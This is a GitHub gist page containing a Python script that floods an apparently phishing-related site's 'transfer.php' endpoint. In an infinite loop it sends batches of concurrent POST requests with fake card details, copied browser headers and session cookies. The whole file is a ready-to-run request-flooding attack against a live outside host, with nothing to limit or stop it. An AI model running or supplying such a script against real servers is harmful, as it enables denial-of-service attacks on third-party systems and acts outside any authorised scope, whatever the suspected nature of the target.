Created
June 22, 2022 16:24
-
-
Save shebpamm/4339e9937fa7da0931737fdd3ff7a58f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import hashlib | |
import aiohttp, asyncio | |
pwncounter = 0 | |
url = "https://p0st1-f1.orderuzumake.bond/transfer.php" | |
payload='id=975257&cardNumber=4007%2B0000%2B0000%2B0027&cardMonth=10&cardYear=23&cardCvv=123&cardBalance=350' | |
headers = { | |
'authority': 'p0st1-f1.orderuzumake.bond', | |
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', | |
'content-type': 'application/x-www-form-urlencoded', | |
'cookie': '__stripe_mid=29afb326-c43e-4898-976a-9d7a319d5153f5fd7b; __stripe_sid=4c82ec4c-e275-45f6-8ff5-c44475209fd1d6825a; q1=cc123bcf50f05c89dd7f7e78f61d1203; q1=c34b2a923f70a90b76a80eace86696e0', | |
'origin': 'https://p0st1-f1.orderuzumake.bond', | |
'pragma': 'no-cache', | |
'referer': 'https://p0st1-f1.orderuzumake.bond/merchant.php?id=975257', | |
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"', | |
'sec-ch-ua-mobile': '?0', | |
'sec-ch-ua-platform': '"Linux"', | |
'sec-fetch-dest': 'document', | |
'sec-fetch-mode': 'navigate', | |
'sec-fetch-site': 'same-origin', | |
'sec-fetch-user': '?1', | |
'upgrade-insecure-requests': '1', | |
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' | |
} | |
#response = requests.request("POST", url, headers=headers, data=payload) | |
async def spam(session): | |
try: | |
print("spam coming") | |
async with session.post(url=url, headers=headers, data=payload) as response: | |
resp = await response.read() | |
except Exception as e: | |
print(e) | |
async def main(): | |
async with aiohttp.ClientSession() as session: | |
ret = await asyncio.gather(*[spam(session) for x in range(10)]) | |
while True: | |
asyncio.run(main()) | |
print("batch complete\n\n") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment